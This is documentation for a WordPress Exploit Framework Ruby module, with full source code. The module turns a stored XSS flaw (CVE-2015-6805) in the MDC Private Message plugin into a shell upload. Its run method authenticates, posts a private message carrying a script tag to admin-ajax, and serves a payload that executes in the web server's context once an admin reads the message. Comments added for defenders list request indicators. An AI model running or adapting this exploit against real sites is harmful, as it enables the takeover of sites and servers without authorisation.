Class: Wpxf::Exploit::MdcPrivateMessageXssShellUpload
- Includes:
- Wpxf, WordPress::Login, WordPress::Plugin, WordPress::Xss
- Defined in:
- lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
-
#initialize ⇒ MdcPrivateMessageXssShellUpload
constructor
A new instance of MdcPrivateMessageXssShellUpload.
- #msg_body ⇒ Object
- #msg_subject ⇒ Object
- #run ⇒ Object
- #user_id ⇒ Object
Methods included from WordPress::Xss
#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script
Methods included from WordPress::Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from Net::HttpServer
#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ MdcPrivateMessageXssShellUpload
Returns a new instance of MdcPrivateMessageXssShellUpload.
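# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 9

# Sets the module metadata and registers the options the module reads.
#
# The metadata describes a stored XSS issue (CVE-2015-6805) in versions
# <= 1.0.0 of the MDC Private Message plugin. Per the description, any
# authenticated user can send a message containing a script, which executes
# once an admin reads the message.
#
# Review notes for defenders:
# - The description says "authenticated users of any level", so any
#   low-privilege account on an affected site is in scope for this issue.
# - msg_subject and msg_body default to random alphanumeric text of random
#   length, so the visible subject and body are not stable indicators. The
#   constant element is the <script> tag appended to the message in #run.
def initialize
  super

  update_info(
    name: 'MDC Private Message XSS Shell Upload',
    desc: 'This module exploits a lack of validation in versions '\
          '<= 1.0.0 of the MDC Private Message plugin which '\
          'allows authenticated users of any level to send messages '\
          'containing a script which allows this module to upload and '\
          'execute the payload in the context of the web server once an '\
          'admin reads the message containing the stored script.',
    author: [
      'Chris Kellum', # Vulnerability discovery
      'rastating'     # WPXF module
    ],
    references: [
      ['CVE', '2015-6805'],
      ['WPVDB', '8154'],
      ['EDB', '37907']
    ],
    date: 'Aug 20 2015'
  )

  # The listing as extracted showed this array as a bare parenthesised
  # expression, which builds the options and then discards them.
  # register_options (mixed in from Options) is the call that records them.
  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with',
      required: true
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with',
      required: true
    ),
    IntegerOption.new(
      name: 'user_id',
      desc: 'The user ID of the user to send the message to',
      default: 1,
      required: true
    ),
    StringOption.new(
      name: 'msg_subject',
      desc: 'The subject of the message that will be sent to the admin',
      required: true,
      default: Utility::Text.rand_alphanumeric(rand(5..20))
    ),
    StringOption.new(
      name: 'msg_body',
      desc: 'The text portion of the message that will be visible to the recipient',
      required: true,
      default: Utility::Text.rand_alphanumeric(rand(10..50))
    ),
  ])
end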
Instance Method Details
#check ⇒ Object
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 64

# Version check for the MDC Private Message plugin, delegated to
# check_plugin_version_from_readme (mixed in from WordPress::Fingerprint).
#
# NOTE(review): the second argument is presumably the first fixed release.
# That would agree with the module description's "<= 1.0.0" - confirm against
# the helper. For triage, a readme reporting a version below 1.0.0.1 marks an
# install that should be upgraded.
#
# @return [Object] whatever check_plugin_version_from_readme returns
def check
  plugin_slug = 'mdc-private-message'
  fixed_version = '1.0.0.1'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end
#msg_body ⇒ Object
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 76

# Reads the 'msg_body' option from the datastore. This is the text portion of
# the message; #run appends the <script> element after it.
#
# @return [Object] the stored value of the 'msg_body' option
def msg_body
  option_name = 'msg_body'
  datastore[option_name]
end
#msg_subject ⇒ Object
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 72

# Reads the 'msg_subject' option from the datastore. #run sends it as the
# 'subject' field of the message request.
#
# @return [Object] the stored value of the 'msg_subject' option
def msg_subject
  option_name = 'msg_subject'
  datastore[option_name]
end
#run ⇒ Object
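# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 80

# Authenticates, stores the script in a private message, then starts the
# module's HTTP server and reports the value of @success.
#
# What the request looks like on the wire, for log review and WAF rules:
# an authenticated POST to the admin-ajax URL with action=mdc_send_msg whose
# 'message' field ends in a <script> element. The subject and the visible
# body are option values and cannot be relied on as indicators.
#
# NOTE(review): the request supplies its own 'from' value, and the message
# markup is stored as sent. That fits the "lack of validation" named in the
# module description, but the plugin handler is not visible here - confirm
# against the plugin source. The version given in #check ('1.0.0.1') is the
# upgrade target to verify.
#
# @return [Object] false when the parent run, authentication or the POST
#   fails; otherwise the value of @success after start_http_server returns
def run
  return false unless super

  # The extracted listing had lost the name of this local: the assignment had
  # no left-hand side and the `cookie:` argument below had no value. It is
  # restored here as `cookie`, matching the keyword it is passed to.
  cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
  return false unless cookie

  # Success will be determined in another procedure, so initialize to false.
  @success = false

  emit_info 'Storing script...'
  # NOTE(review): the second argument presumably restricts this line to
  # verbose output - confirm against OutputEmitters#emit_info.
  emit_info xss_include_script, true

  res = execute_post_request(
    url: wordpress_url_admin_ajax,
    cookie: cookie,
    body: {
      'action' => 'mdc_send_msg',
      # Sender and recipient are both set from the same user_id option.
      'from' => user_id.to_s,
      'to' => user_id.to_s,
      'subject' => msg_subject,
      'message' => "#{msg_body}<script>#{xss_include_script}</script>"
    }
  )

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success "Script stored and will be executed when the user views the message"

  # NOTE(review): start_http_server (from Net::HttpServer) presumably blocks
  # until the server is stopped, with @success set by a request handler in
  # the meantime - confirm against the mixin.
  start_http_server
  @success
end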
#user_id ⇒ Object
# File 'lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb', line 68

# Value of the 'user_id' option as returned by normalized_option_value
# (mixed in from Options). #run sends it, converted with to_s, as both the
# 'from' and the 'to' field of the message request.
#
# @return [Object] the normalized value of the 'user_id' option
def user_id
  option_name = 'user_id'
  normalized_option_value(option_name)
end